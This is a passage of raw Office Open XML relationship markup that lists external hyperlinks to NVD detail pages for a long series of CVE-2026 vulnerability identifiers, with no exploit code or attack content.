Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72933" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72940" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72950" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72959" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72960" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72972" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72973" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72986" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73018" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77106" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77504" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77901" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77906" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77907" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77908" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78439" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78442" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78463" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78504" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78505" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78507" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78511" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78512" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78514" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78517" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78518" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78519" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78521" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78524" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78525" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78526" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78834" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79376" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79602" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80074" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80077" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80080" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80081" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80085" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81352" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81385" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId296" /><Relationship 